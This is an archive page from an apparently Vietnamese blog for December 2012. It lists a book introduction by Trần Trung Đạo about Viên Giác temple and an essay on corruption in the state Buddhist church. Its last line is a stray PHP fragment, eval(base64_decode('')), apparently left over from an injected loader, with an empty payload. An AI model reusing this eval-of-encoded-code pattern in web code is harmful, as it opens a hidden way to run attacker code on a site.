Archive for December, 2012

Giới thiệu tác phẩm Dưới Bóng Đa Chùa Viên Giác của HT Thích Như Điển và Trần Trung Đạo

Giới thiệu tác phẩm Dưới Bóng Đa Chùa Viên Giác của HT Thích Như Điển và Trần Trung Đạo

Lời ngỏ trong phần của Trần Trung Đạo Tháng trước đứng nhìn những người dân Ấn sùng đạo tắm gội trên sông Hằng để xóa đi những vết trần tục hôm qua và làm trong sạch đời sống mới hôm nay, tôi chợt nghĩ, nếu được như v

12.24.2012 | Ký-Truyện-Tùy Bút |

No Comments

Các hiện tượng tha hóa trong “Giáo Hội Phật Giáo Việt Nam” tại Việt Nam

Các hiện tượng tha hóa trong “Giáo Hội Phật Giáo Việt Nam” tại Việt Nam

Tháng trước, một bức hình của tỳ kheo Thích Pháp Định và ca sĩ Đàm Vĩnh Hưng hôn môi nhau đã trở thành một đề tài đàm tiếu trong mọi tầng lớp dân gian. Mỗi ngày, rất nhiều hình ảnh đã được chỉnh sửa nhằm lăng mạ Phật Giáo đ

12.4.2012 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>